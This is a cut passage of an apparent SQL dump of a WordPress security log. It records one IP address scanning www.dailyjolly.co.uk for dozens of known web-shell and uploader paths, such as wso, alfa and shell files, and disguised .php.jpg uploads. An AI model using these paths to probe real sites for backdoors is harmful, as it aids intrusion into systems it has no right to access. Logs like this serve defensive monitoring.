ilyjolly.co.uk/images/reg_form.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369882.0498,55,'icMoYVvNPp7nWx3LgfhZDXK1','','19|0|0|0|www.dailyjolly.co.uk/images/sagafif.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369882.4534,55,'3ri4ygO9fUvmaK1GYLoT6lkt','','19|0|0|0|www.dailyjolly.co.uk/images/sendme.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369882.7596,55,'e0pl2hxnSbc31Q5kYwBV6ZUm','','19|0|0|0|www.dailyjolly.co.uk/images/sfm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369883.0988,55,'oXYNDbC2Ge83qmAVjvSLuEcn','','19|0|0|0|www.dailyjolly.co.uk/images/test_upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369883.4712,55,'b69Olx5X3IMseHRUVLkJ8QCh','','19|0|0|0|www.dailyjolly.co.uk/images/unzip.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369883.7849,55,'Rrj4gVUNbeMKaZz30Oc9hXv7','','19|0|0|0|www.dailyjolly.co.uk/images/up.pdf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369884.1181,55,'mYIclvyDjL967iEHZSAn4oKT','','19|0|0|0|www.dailyjolly.co.uk/images/upload_submition.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369884.4407,55,'3uEXAPdtsz9mqaCWlV5ZMYcI','','19|0|0|0|www.dailyjolly.co.uk/images/uu_file_upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369884.8542,55,'O0EIfuBD9szka3UYKATrcGgW','','19|0|0|0|www.dailyjolly.co.uk/images/add-actualites.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369885.7447,55,'7RqzeFmsJZGEoS5PWv6fQDaI','','19|0|0|0|www.dailyjolly.co.uk/images/alumini/9227_a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369886.1251,55,'t9ZQRCYpnMrKws6h3IlDTeuN','','19|0|0|0|www.dailyjolly.co.uk/images/headers/readme.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369886.4583,55,'xKiOTyFs0zZj6wW74npDC3he','','19|0|0|0|www.dailyjolly.co.uk/images/images.phtml',0,19,0),('167.172.248.229',2813130981,'',0,1674369886.8161,55,'lLu7NYZsX1UkHoh8BC0K9pVA','','19|0|0|0|www.dailyjolly.co.uk/upload/addProduct.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369887.2020,55,'hEy3aqXGk8RTtCIVl7Q5PHpo','','19|0|0|0|www.dailyjolly.co.uk/upload/dir.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369887.6084,55,'dPepIQvm2VhuMbUa0nlg6OtJ','','19|0|0|0|www.dailyjolly.co.uk/upload/fud1.php.jpg',0,19,0),('167.172.248.229',2813130981,'',0,1674369888.0278,55,'WkRiPeYbhl3FcpxHVou1smGS','','19|0|0|0|www.dailyjolly.co.uk/upload/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369888.8200,55,'SnUl9jI2ZaimHxJePWQCshv7','','19|0|0|0|www.dailyjolly.co.uk/upload/vvvindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369889.2078,55,'EWYbt6zavMp7P1GdsAlKwoXx','','19|0|0|0|www.dailyjolly.co.uk/upload/file/zup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369889.5934,55,'MxoQgHjOE0KGpiLdR87bfJeS','','19|0|0|0|www.dailyjolly.co.uk/upload/petit/fm.php.gif',0,19,0),('167.172.248.229',2813130981,'',0,1674369890.3612,55,'FKRGaNBOrioEMkpcmdgw5Ynt','','19|0|0|0|www.dailyjolly.co.uk/upload/project/prv.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369890.7980,55,'JqjyM01zvcAi3f96ua7nsgGH','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/as.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369891.2153,55,'q7jHTEIPM9NnVSXZOtxeQikA','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/shell.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369891.5885,55,'YyTX74dtsRWIOeafUn1NqjHb','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/z7.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369891.9494,55,'DYZ3CHFAPbSegyGB75hEOVos','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/module.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369892.3227,55,'S6WqJkAB8LEa5P9iso0wCyhI','','19|0|0|0|www.dailyjolly.co.uk/wp-content/a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369892.6354,55,'HRwZBm5TunSPJCc6oINqOG4h','','19|0|0|0|www.dailyjolly.co.uk/wp-content/AronTn.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369892.9604,55,'Rnp3gITLFtQw2HAoEDkf6Vji','','19|0|0|0|www.dailyjolly.co.uk/wp-content/core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369893.2858,55,'nv4VlLoYteiIRHX20ZW7ESQT','','19|0|0|0|www.dailyjolly.co.uk/wp-content/languages/admin-network-ru_RU.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369893.6162,55,'N5zJU1epHQKWZiOdDV6kaIjv','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/clientprofile/mediagallery.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369893.9430,55,'ywQtPGxUWlC3f5kZVJuq7TDn','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/db-toolkit/dbtoolkit_import.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369894.2641,55,'juawLGWpQOfoMJFths9l3CDb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/errynclkzk/dadwehyzpf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369894.6064,55,'Ib16JfuiHOWVxnMp9k38aScd','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/hello-dolly/install.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369894.9190,55,'vF48c5tQJAmxkiMBO1uKHY2d','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-symetrio/schedule-symetrio.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369895.2434,55,'r4Jc8qawU5ZEzWMk6m7RQANl','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/intigo-child/ptm-import.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369895.5770,55,'mnvSQ8Xfz5TsipI3q2OYxCK7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/mc4wp-debug-log.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369895.9396,55,'cbW6kOvXGm3DfzVLjstr4xwN','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2012/str_pad.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369896.2700,50,'0Gq8NPvtzm6ipYjO59onrKU4','','10|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2016/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674369896.2958,55,'0Gq8NPvtzm6ipYjO59onrKU4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2016/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369896.6426,55,'FymRDphXLq9BIUx7ivQNVfz3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2018/wp-conflg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369896.9789,50,'fQNlaORm7bxk0jgLe2ASWnD3','','10|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2021/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674369896.9897,55,'fQNlaORm7bxk0jgLe2ASWnD3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2021/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369897.3283,55,'9khltfryu3xTEm6YOp1djgob','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/1wiki.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369897.6754,55,'bYfojeTNs5iCIvLQBr0Otd2c','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/checkbox.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369898.0069,55,'5FPg87BNhrfpjYo2K9RutIAH','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/data-user.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369898.3362,55,'c4lir8zh7MEk3FSwmpBOXLVG','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/2022/wp-conflg.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674369898.6656,55,'S0EAcMnmfzJT7BVyChI6otFU','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/3ponu.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369899.2082,55,'3YFb4feUG0gmE1NkQpirAcRK','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/404.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369899.5873,55,'3ugbyRG2DztsxZA1ir4CwHPF','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/archieving.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369899.9191,55,'3rekm7fSdcDsWXRhJO6wEzqj','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/assignments/update.php.docx',0,19,0),('167.172.248.229',2813130981,'',0,1674369900.2645,55,'DfwCjKbsHYGJ4Ud3Z6gAVSeI','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/batm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369900.5856,55,'W2B1gavJn7DNcQMptLePm5yT','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/bg_info.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369900.9134,55,'7quihBQ3RerbZFmMzCNY0sc8','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/bulk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369901.2303,55,'oTO7h9XZInAxzilk83BUc2KL','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/bypass.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369902.2068,55,'mlhJyPkxW0CIpEYgN5w36OSo','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/dokumenty/about.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369902.5482,55,'SOcGekt2WxbC5lI6JjUQDYTw','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/external_feed.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369902.8865,55,'GtQifmuVqLBY3WOUZ2k6Jz5H','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/help.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369903.2150,55,'T6U4MjHCd5rYfan3W1ctBvbw','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ipc9z9.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369903.5508,55,'4ayNASeRFuE5UVBDnOk1cChX','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/js.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369903.8873,55,'qivnNkgFxL93PGXdyfZmr0a6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/krop.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369904.1998,55,'UWg1X9ANwqu0ZOveKVxjfps5','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/l.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369904.5196,55,'0wUrCZJEs8kyAnumWtdgGxBb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369904.8488,55,'82vgROXsr3MbI5kcS9AQqWBt','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/mindex2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369905.1914,55,'I7Myc4xXozjGFdNUSafpsLDK','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/old.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369905.5373,55,'LvNoE230FcTpGtdgkJiCIxAa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/shwso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369905.8718,55,'BcnyQ8ao5xG1z6SZf9VjUY7P','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/uigen_2016/gaxa1.php.jpg',0,19,0),('167.172.248.229',2813130981,'',0,1674369906.2090,55,'hr7msPfnC2D9y1FVTj3vIWou','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369906.5388,55,'ZcgRopkTjJnuma3NEG8hQ5zl','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-logout.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369906.8838,55,'fS4XI1wgCkBKJFMlROzcn5q2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369907.2433,55,'aTD9dVn0bXfIHxi7Ys4t5pko','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/0aa.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674369907.6017,55,'7OhSpQ8Nj0CV5uKncevAYoyq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/24.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369907.9348,55,'1uweEJiAybntkj0UCZBOfGgM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/414lfv.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369908.2882,55,'pWVL1BnMfyKSwEUzPkD0YFGa','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/a57bze8931.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369908.6252,55,'t5MsOUmD67q2SIAipZJj9TzL','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/all.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369908.9858,55,'fdtVj7UDeFRnGCImuzpyPMi2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/array_reduce.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369909.3192,55,'PAmB81g7r3HOdkXJoicSK9hY','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/back.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369909.6608,55,'HAz5iD9rbngqZXWSE7MKOGam','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/block-line.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369909.9968,55,'R5xNkeaZVKGz0TO2IfE34SP7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/cache-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369910.4318,55,'XK9Yi4ANLuvJxsQ58UByRdWI','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/category-template-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369910.7581,55,'4XpLnJrySiVeog2O70mx8C3a','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-feed-ajax.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369911.0968,55,'Winj2sFQ6LbaA1oZUex5dI3O','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-join.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369911.4546,55,'9Tx1MKAOgCZvU6dsSHjRWine','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-phpmailer-stream.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369911.8284,55,'mkv0rIaAt7N8ngQb4XZUPzTE','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-walker-category-dropdown-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369912.1494,55,'lwMJc0HIjVYfO1orWdS6A2vB','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-cdomize-admin.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369912.5096,55,'fKiunt0UFGzN9wRQc1v6MCXx','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-customize-control-wp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369912.9426,55,'I9n7MVN8skF0zpcWiJboDSBK','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-customize-setting-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369913.2774,55,'hzZcbks9ofBES3J5PWGvKdRu','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-http-curl-stream.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369913.6134,55,'PByeEAq3zTm7NO8hJaivs2pf','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-http-encoding-ajax.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369913.9383,55,'cr9gl8QE7ZdoyHJzNvV6qbIC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-ajax.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369914.3667,55,'rA3meQlJtGs6BhIcyaDbqLCZ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369914.7296,55,'MpNyx1RVKikhtdA9UjSamIeg','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-oembed-controller-private.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369915.0511,55,'qmJwVbplkCjh9PLG7EUDiuYn','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-session-tokens-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369915.3601,55,'h6NQupiWDK0sU7OcxbAjaknV','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-simplepie-sanitize-kses-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369915.6869,55,'OfEHT2VJlwsIZ9N0xS5kAa1j','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-upgrade.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369916.0139,55,'BxTX1ZckF0d46GuN9mSqJagC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-uploads.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369916.3489,55,'RktFTW4p6vsfx2zOoBGgZd5w','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-user-request-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369916.6851,55,'MLshpowXc5kxbKIaTeRDgd4V','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-widget-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369917.0125,55,'FJMfbGEOu4iB0Ug1PRjarmve','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/class-wp-widget-side.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369917.3567,55,'o1DurFXq3iE8eVsRySHvhmB2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/cof.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369917.7273,55,'hnwBYyU12zj6xRcaSDouOiGr','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/comment-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369918.0644,55,'0lWgRUYqMhosHwIkdZQubLv8','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/compat-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369918.4149,55,'FeQXBnV4fcIpv0Gl1jRL39H5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369918.7547,55,'de4iCQpMZkJogEwPlKA7hIGr','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/cY4bsE.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369919.1238,55,'JNIVoqaYXCcMUw3WEb6HTkrh','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/email.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369919.4824,55,'PkJQ6DxmF0KpI8qZSv1Gyhju','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/embed-template-core.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369919.8084,55,'AbEZ8xMLRzjDNwq23Fh5edvT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/emusuf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369920.1427,55,'nPAOysdYZxN9IHhz0W2Qmv7L','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/error-protection-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369920.4740,55,'jMtcel1PURnhBwLWpK802AGb','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/feed-rss2-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369920.7906,55,'KFGWPpcEvfSn6z2sjMtUhryk','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/flickr.class.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369921.1172,55,'neJ0NFIuMwZWPEg5zmGKLoV6','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/gindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369921.5637,55,'uJz9eK4lRC2Mh57oAwjxPUbr','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/GOj9m.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369921.9049,55,'KNQnhbrG3WmwAMp9LZgd1jB7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/Hk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369922.2506,55,'pSYQMn0m6utUJRkibCVoa4xD','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/includes.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369922.5870,55,'5pZoGR9YdcqgFJrtM2jbh3TC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/json.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369922.9057,55,'zLDJTBIrOlyECavkdhe7XSi0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/jvc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369923.2298,55,'akZ6KCwq98cHgb37tijxzvYm','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/kab.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369923.6281,55,'TyQa3xE1W8tJwbrKnlZCNOMp','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ms_config.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369924.0214,55,'W9q6MjDF2naexXRbTYOyr4HN','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/nav-menu-private.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369924.3634,55,'L8Sg5QIr6eChv9qb1f7jnwst','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/notice.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369924.7249,55,'YE80H2SZCrhVWJqOUemsXAN4','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/options-index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369925.1040,55,'bLCVJUxXzOPt2KiyBgoacWmu','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/PR1eg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369925.5146,55,'q6NIxkQrAEci5ZnvBWYSjt2L','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/programa_apoyo_editoriales.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369925.9199,55,'s34F7dDvw8XW5KjPaZpUNnOC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/revision-meta.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369926.2315,55,'ZP3O7kM5o0LANHvy8bY4tS96','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/revo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369926.5808,55,'YcROnjpgeFIVbUiNBT8LEkSs','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/RxR_iblkjmoy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369926.9167,55,'HvQwngm5GLqCKlstPO1j6IBb','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/safeparam-doctype.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369927.2523,55,'no21R5EcF8j63LGUhMsgyzuI','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/seo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369927.5771,55,'aEzrLyixtgfmKs41W9B7Nk6l','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/settings.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369927.9622,55,'O10Py45V7eDTa98JwsCvYG3q','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/shell20211028.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674369928.2929,55,'90MBfVPHTrnONZpzKYbjG78y','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/sidwso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369928.6764,55,'V8iP1esTDm6WEzxpYChLZSd2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/sk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369929.0100,55,'iJMQrU6fCoyBnSklVRmIYchP','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/system.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369929.3583,55,'aJ8CXroWkQL0dA6OVt1jU5YK','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/tax2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369929.6998,55,'BvgjOUi4fwbHW3SPEmhzrntk','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/trio-kece.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369930.0241,55,'jdp8Frc7ktWliU5vwOyHMzCo','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/uplaod.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369930.3875,55,'0UsBlh3CPbL2YvRjAwxzWdMJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/uploadzip.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369930.7342,55,'1AuGbVjn5oeEd7LH0FU9hk6P','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/user-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369931.0641,55,'Q18GiDgoHMX5KnYOmSvrNwe7','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/users.php.suspected',0,19,0),('167.172.248.229',2813130981,'',0,1674369931.4050,55,'kj1D8CHVP0WKtYM9rpB7buAz','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/vjgtd8LW.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369931.7588,55,'SzuXnBlT6wIMDgchyfxaGZko','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369932.1250,55,'M9hW82zE51Z0Ork6AaXSFneQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369932.5379,55,'Llzfo4TjFcvxEebN1aVW65kB','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-gypqic.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369932.8837,55,'9zEmphcrUQxbuTqn0jDZJ5MY','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369933.2438,55,'aYnCuBDKM0XmbljgpQ1cN8iS','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-log.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369933.6006,55,'nXdOWP6qbkmGiBuAYf3HJT2R','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-logs.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369933.9555,55,'8yp1dWUnNr6azhBVFKxIv2RL','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369934.3186,55,'4byRYHX3NIjU0epDK5LMGTAk','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-type.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369934.8672,55,'xhkNECZqAUvoPIBDuaJcHrT2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wpspl-load-compat.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369935.1821,55,'hHF6TilydN1wzaIQS48PDket','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369935.5079,55,'WhXlSdgwzAmLQi9IoGn2PUE3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/assets/alfa4.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369935.8700,55,'aZ13fL5vtc7M2p9JEGwjHToi','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/block-supports/layout-ajax-response.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369936.1847,55,'pAjzC14ZFlMeNcL7H0VTRvBE','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/comments-popup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369936.5085,55,'T8c3NIdO04pnBZxPCe7JHXzS','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/image_type_to_mime_type.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369936.8358,55,'d3KDvTnWfhY40cuHPqilegJG','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/submenu-pspell.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369937